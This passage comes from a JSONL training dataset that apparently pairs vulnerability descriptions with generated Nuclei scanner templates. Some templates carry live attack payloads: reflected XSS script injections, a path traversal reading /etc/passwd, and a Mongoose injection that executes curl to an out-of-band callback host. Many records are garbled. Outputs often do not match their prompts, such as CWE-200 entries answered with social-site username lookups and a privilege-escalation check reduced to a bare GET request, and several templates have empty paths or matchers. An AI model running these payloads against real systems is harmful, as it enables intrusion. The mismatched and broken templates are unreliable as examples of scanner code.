dsl\n - type: word\n words:\n - \"Account not found.\" \n - \"ouch!\" \n - \"SurveySparrow\" \n condition: and", "category": "generic", "severity": "high", "id": "surveysparrow-takeover"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dribbble\n\ninfo:\n name: Dribbble User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Dribbble user name information check was conducted.\n tags: osint,osint-art,dribbble,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://dribbble.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" | Dribbble\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Unauthenticated Netdata", "input": "Title: Unauthenticated Netdata\nSummary: Unauthenticated Netdata. Netdata is exposed.. Tags: netdata, unauth, misconfig\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: unauthenticated-netdata\n\ninfo:\n name: Unauthenticated Netdata\n author: dhiyaneshDk\n severity: medium\n description: Netdata is exposed.\n tags: netdata,unauth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"view_update_every\" \n - \"dimensions\" \n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header", "category": "generic", "severity": "medium", "id": "unauthenticated-netdata"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - GStatic Angular", "input": "Title: Content-Security-Policy Bypass - GStatic Angular\nSummary: Content-Security-Policy Bypass - GStatic Angular. Tags: xss, csp-bypass, gstatic-angular\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gstatic-angular-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - GStatic Angular\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - GStatic Angular\n tags: xss,csp-bypass,gstatic-angular,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"gstatic.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "gstatic-angular-csp-bypass"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: oglaszamy24hpl\n\ninfo:\n name: Oglaszamy24h.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Oglaszamy24h.pl user name information check was conducted.\n tags: osint,osint-shopping,oglaszamy24hpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://oglaszamy24h.pl/profil,{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Profil u\u017cytkownika:\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2016-1000129", "input": "Title: Cross-Site Scripting (XSS) in defa-online-image-protector_project defa-online-image-protector\nSummary: Reflected XSS in wordpress plugin defa-online-image-protector v3.3\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: defa-online-image-protector_project defa-online-image-protector\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-1000129\n\ninfo:\n name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Defa Online Image Protector\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2016-1000129"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: unauth-pact-broker\n\ninfo:\n name: Unauth Pact Broker - Detect\n author: pdteam\n severity: medium\n description: Unauthenticated access to Pact Broker, a repository for consumer-driven contracts and verification results.\n tags: pactbroker,misconfig,unauth,pacts,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/pacts\" \n - \"{{BaseURL}}/ui/relationships\" \n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Abstract Api Company Enrichment Test", "input": "Title: Abstract Api Company Enrichment Test\nSummary: Abstract Api Company Enrichment Test. Enrich any domain or email with accurate company data, including headcount, location and industry.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-abstract-company-enrichment\n\ninfo:\n name: Abstract Api Company Enrichment Test\n author: daffainfo\n severity: info\n description: Enrich any domain or email with accurate company data, including headcount, location and industry.\n tags: token-spray,abstractapi\n\nhttp:\n - method: GET\n path:\n - \"https://companyenrichment.abstractapi.com/v1/?api_key={{token}}&domain=airbnb.com\" \n matchers:\n - type: word\n words:\n - \"\"name\":\" \n - \"\"domain\":\" \n - \"\"year_founded\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-abstract-company-enrichment"} +{"instruction": "Generate a Nuclei template for CVE-2019-16097", "input": "Title: Missing Authorization in linuxfoundation harbor\nSummary: core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.\nVulnerability Type: Missing Authorization\nSeverity: medium\nAffected Products: linuxfoundation harbor\nIndicators: error, vulnerability detected", "output": "id: harbor-workflow\n\ninfo:\n name: Harbor Security Checks\n author: pikpikcu\n severity: info\n description: A simple workflow that runs all Harbor related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2019-16097"} +{"instruction": "Generate a Nuclei template for: Generic C2 JARM - Detect", "input": "Title: Generic C2 JARM - Detect\nSummary: Generic C2 JARM - Detect. Detect C2 Servers with JARM Hashes\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: generic-c2-jarm\n\ninfo:\n name: Generic C2 JARM - Detect\n author: pussycat0x\n severity: info\n description: Detect C2 Servers with JARM Hashes\n tags: network,jarm,c2,ir,osint,cti,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "generic-c2-jarm"} +{"instruction": "Generate a Nuclei template for CVE-2024-53900", "input": "Title: SQL Injection in mongoosejs mongoose\nSummary: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: mongoosejs mongoose\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-53900\n\ninfo:\n name: Mongoose < 8.8.3 - Remote Code Execution\n author: h4mg\n severity: critical\n description: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.\n tags: cve,cve2024,rce,mongoose,nosql,nodejs,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?view[path]={{pfield}}&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-53900"} +{"instruction": "Generate a Nuclei template for CVE-2020-8193", "input": "Title: Vulnerability (CWE-284) in citrix application_delivery_controller_firmware and others\nSummary: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\nVulnerability Type: Vulnerability (CWE-284)\nSeverity: medium\nAffected Products: citrix application_delivery_controller_firmware, citrix netscaler_gateway_firmware, citrix gateway_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-8193\n\ninfo:\n name: Citrix - Local File Inclusion\n author: pdteam\n severity: medium\n description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.\n tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "medium", "id": "CVE-2020-8193"} +{"instruction": "Generate a Nuclei template for: Unconfigured Cloud CDN Origin Authentication", "input": "Title: Unconfigured Cloud CDN Origin Authentication\nSummary: Unconfigured Cloud CDN Origin Authentication. Ensure that Cloud CDN origins are configured to authenticate access to the content available at backend (backend buckets or backend services) using signed cookies and signed URLs. Signed cookies and URLs are designed to prevent unauthorized users from bypassing the authentication process and accessing sensitive information.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-cdn-origin-auth-unconfigured\n\ninfo:\n name: Unconfigured Cloud CDN Origin Authentication\n author: princechaddha\n severity: medium\n description: Ensure that Cloud CDN origins are configured to authenticate access to the content available at backend (backend buckets or backend services) using signed cookies and signed URLs. Signed cookies and URLs are designed to prevent unauthorized users from bypassing the authentication process and accessing sensitive information.\n tags: cloud,devops,gcp,gcloud,cloud-cdn,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-cdn-origin-auth-unconfigured"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: plesk-obsidian-login\n\ninfo:\n name: Plesk Obsidian Login Panel - Detect\n author: dhiyaneshDK,daffainfo\n severity: info\n description: Plesk Obsidian login panel was detected.\n tags: panel,plesk,login,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login_up.php\" \n matchers:\n - type: word\n words:\n - \"Plesk Obsidian\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-39598", "input": "Title: Cross-Site Scripting (XSS) in icewarp webclient\nSummary: Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: icewarp webclient\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39598\n\ninfo:\n name: IceWarp Email Client - Cross Site Scripting\n author: Imjust0\n severity: medium\n description: Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n tags: cve2023,cve,xss,icewarp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\">\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"icewarp\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-39598"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: contentkeeper-detect\n\ninfo:\n name: ContentKeeper Cloud Panel - Detect\n author: geeknik\n severity: info\n description: ContentKeeper Cloud panel was detected.\n tags: contentkeeper,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ck/domenu.cgi\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"ContentKeeper Technologies\" \n - \"ContentKeeper.com\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Secure Transfer for OSS Buckets - Disabled", "input": "Title: Secure Transfer for OSS Buckets - Disabled\nSummary: Secure Transfer for OSS Buckets - Disabled. Disabling secure transfer (HTTPS) for OSS buckets exposes data to potential interception. It is recommended to enable HTTPS to ensure encrypted communication and data security.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: secure-transfeross-disabled\n\ninfo:\n name: Secure Transfer for OSS Buckets - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Disabling secure transfer (HTTPS) for OSS buckets exposes data to potential interception. It is recommended to enable HTTPS to ensure encrypted communication and data security.\n tags: cloud,devops,aliyun,alibaba,aliyun-cloud-config,alibaba-oss\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "secure-transfeross-disabled"} +{"instruction": "Generate a Nuclei template for CVE-2010-1305", "input": "Title: Path Traversal in joomlamo com_jinventory\nSummary: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: joomlamo com_jinventory\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1305\n\ninfo:\n name: Joomla! Component JInventory 1.23.02 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,joomlamo,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1305"} +{"instruction": "Generate a Nuclei template for: Zsh - Privilege Escalation", "input": "Title: Zsh - Privilege Escalation\nSummary: Zsh - Privilege Escalation. zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-zsh\n\ninfo:\n name: Zsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n tags: code,linux,zsh,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-zsh"} +{"instruction": "Generate a Nuclei template for: Allegro RomPager - Panel", "input": "Title: Allegro RomPager - Panel\nSummary: Allegro RomPager - Panel. Allegro RomPager was detected.This toolkit was commonly used in embedded devices such as routers, cameras, and IoT devices, often on historical hardware with possible default credentials.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: allegro-rompager-panel\n\ninfo:\n name: Allegro RomPager - Panel\n author: matejsmycka\n severity: info\n description: Allegro RomPager was detected.This toolkit was commonly used in embedded devices such as routers, cameras, and IoT devices, often on historical hardware with possible default credentials.\n tags: tech,allegro,rompager,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Allegro-Software-RomPager/\" \n part: server\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "allegro-rompager-panel"} +{"instruction": "Generate a Nuclei template for CVE-2021-25085", "input": "Title: Cross-Site Scripting (XSS) in pluginus woocommerce_products_filter\nSummary: The WOOF WordPress plugin before 1.2.6.3 does not sanitise and escape the woof_redraw_elements before outputing back in an admin page, leading to a Reflected Cross-Site Scripting\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: pluginus woocommerce_products_filter\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25085\n\ninfo:\n name: WOOF WordPress plugin - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=\" \n matchers:\n - type: word\n words:\n - \"\"additional_fields\":[\"\"]}\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-25085"} +{"instruction": "Generate a Nuclei template for CVE-2020-36731", "input": "Title: Cross-Site Scripting (XSS) in wpdesk flexible_checkout_fields_for_woocommerce\nSummary: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: wpdesk flexible_checkout_fields_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-36731\n\ninfo:\n name: Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update\n author: popcorn94\n severity: high\n description: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.\n tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"order_\" \n - \"[custom_field]\" \n - \"inspire_checkout_fields[settings][order]\" \n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Settings resetted.\"", "category": "cve", "severity": "high", "id": "CVE-2020-36731"} +{"instruction": "Generate a Nuclei template for CVE-2021-20021", "input": "Title: Vulnerability (CWE-269) in sonicwall email_security and others\nSummary: A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: sonicwall email_security, sonicwall email_security_appliance_9000_firmware, sonicwall email_security_appliance_3300_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-20021\n\ninfo:\n name: SonicWall Email Security <= 10.0.9.x - Unauthenticated Admin Account Creation\n author: pussycat0x\n severity: critical\n description: SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.\n tags: cve,cve2021,sonicwall,email-security,auth-bypass,kev,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.html\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-20021"} +{"instruction": "Generate a Nuclei template for CVE-2025-54251", "input": "Title: Vulnerability (CWE-91) in adobe experience_manager\nSummary: Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to manipulate XML queries and gain limited unauthorized write access.\nVulnerability Type: Vulnerability (CWE-91)\nSeverity: medium\nAffected Products: adobe experience_manager\nIndicators: unauthorized", "output": "id: CVE-2025-54251\n\ninfo:\n name: Adobe Experience Manager \u2264 6.5.23.0 - XML Injection\n author: DhiyaneshDK,assetnote\n severity: medium\n description: Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.\n tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-54251"} +{"instruction": "Generate a Nuclei template for: JavaServer Faces Detection", "input": "Title: JavaServer Faces Detection\nSummary: JavaServer Faces Detection. Searches for JavaServer Faces content on a URL.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jsf-detect\n\ninfo:\n name: JavaServer Faces Detection\n author: brenocss,Moritz Nentwig\n severity: info\n description: Searches for JavaServer Faces content on a URL.\n tags: jsf,tech,primefaces,richfaces,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "jsf-detect"} +{"instruction": "Generate a Nuclei template for: Server-Side Encryption on Amazon S3 Buckets", "input": "Title: Server-Side Encryption on Amazon S3 Buckets\nSummary: Server-Side Encryption on Amazon S3 Buckets. This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS).\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: s3-server-side-encryption\n\ninfo:\n name: Server-Side Encryption on Amazon S3 Buckets\n author: princechaddha\n severity: high\n description: This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS).\n tags: cloud,devops,aws,amazon,s3,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "s3-server-side-encryption"} +{"instruction": "Generate a Nuclei template for: Domibus - Detect", "input": "Title: Domibus - Detect\nSummary: Domibus - Detect. Domibus was detected.\n. Tags: tech, domibus, detect\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: domibus-detect\n\ninfo:\n name: Domibus - Detect\n author: righettod\n severity: info\n description: Domibus was detected.\n tags: tech,domibus,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/domibus/rest/application/info\" \n - \"{{BaseURL}}/domibus/\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "domibus-detect"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ulubpl\n\ninfo:\n name: Ulub.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Ulub.pl user name information check was conducted.\n tags: osint,osint-misc,ulubpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"http://ulub.pl/profil/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Muzyka (\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2024-11587", "input": "Title: Cross-Site Scripting (XSS) in idccms idccms\nSummary: A vulnerability was found in idcCMS 1.60. It has been classified as problematic. This affects the function GetCityOptionJs of the file /inc/classProvCity.php. The manipulation of the argument idName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: idccms idccms\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11587\n\ninfo:\n name: idcCMS V1.60 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.\n tags: cve,cve2024,xss,idccms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"add(new Option\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "low", "id": "CVE-2024-11587"} +{"instruction": "Generate a Nuclei template for: Set SSH Idle Timeout Interval", "input": "Title: Set SSH Idle Timeout Interval\nSummary: Set SSH Idle Timeout Interval. Missing an SSH idle timeout interval can lead to security risks by allowing unattended sessions to remain open, increasing the chance of unauthorized access or session hijacking.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: file-idle-timeout-interval\n\ninfo:\n name: Set SSH Idle Timeout Interval\n author: pussycat0x\n severity: info\n description: Missing an SSH idle timeout interval can lead to security risks by allowing unattended sessions to remain open, increasing the chance of unauthorized access or session hijacking.\n tags: audit,config,file,ssh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "file-idle-timeout-interval"} +{"instruction": "Generate a Nuclei template for: ACM Certificates Pre-expiration Renewal", "input": "Title: ACM Certificates Pre-expiration Renewal\nSummary: ACM Certificates Pre-expiration Renewal. Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: acm-cert-renewal-45days\n\ninfo:\n name: ACM Certificates Pre-expiration Renewal\n author: princechaddha\n severity: medium\n description: Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions.\n tags: cloud,devops,aws,amazon,acm,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "acm-cert-renewal-45days"} +{"instruction": "Generate a Nuclei template for: PowerStar Malware Hash - Detect", "input": "Title: PowerStar Malware Hash - Detect\nSummary: PowerStar Malware Hash - Detect. Detects the batch script used to persist PowerStar via Startup.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: powerstar-malware-hash\n\ninfo:\n name: PowerStar Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects the batch script used to persist PowerStar via Startup.\n tags: malware,charmingkitten\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "powerstar-malware-hash"} +{"instruction": "Generate a Nuclei template for: All 404 Redirect to Homepage Detection", "input": "Title: All 404 Redirect to Homepage Detection\nSummary: All 404 Redirect to 